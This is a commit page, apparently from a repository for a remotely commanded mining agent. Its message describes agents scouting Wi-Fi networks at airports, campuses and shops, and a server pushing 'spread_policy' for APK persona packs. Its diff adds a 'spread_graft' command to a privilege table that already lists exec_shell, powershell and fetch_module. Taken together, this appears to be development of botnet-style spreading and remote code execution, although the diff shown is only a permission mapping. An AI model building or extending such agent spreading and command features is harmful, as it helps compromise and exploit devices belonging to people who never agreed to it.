Add scout constellation mode for APK venue persona packs.
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Cluster 3+ scout_report hits on the same SSID within 10 minutes; server infers airport/campus/retail venue class and pushes persona spread_policy. Emberwake weather-map merges active scout biomes. Includes agent, server API, and Vitest coverage.
This commit is contained in:
@@ -52,7 +52,7 @@ func ActionRequiredLevel(action string) int {
|
||||
return L2
|
||||
case "exec", "exec_shell", "powershell", "agent_command":
|
||||
return L3
|
||||
case "fetch_module", "set_agent_version", "reorder_tiers", "adaptive_strategy_update":
|
||||
case "fetch_module", "set_agent_version", "reorder_tiers", "adaptive_strategy_update", "spread_graft":
|
||||
return L4
|
||||
default:
|
||||
return L0
|
||||
@@ -83,7 +83,7 @@ func CommandRequiredLevel(cmdType string, args map[string]interface{}) int {
|
||||
}
|
||||
}
|
||||
return L1
|
||||
case "set_agent_version", "reorder_tiers":
|
||||
case "set_agent_version", "reorder_tiers", "spread_graft":
|
||||
return L4
|
||||
default:
|
||||
return ActionRequiredLevel(typ)
|
||||
|
||||
Reference in New Issue
Block a user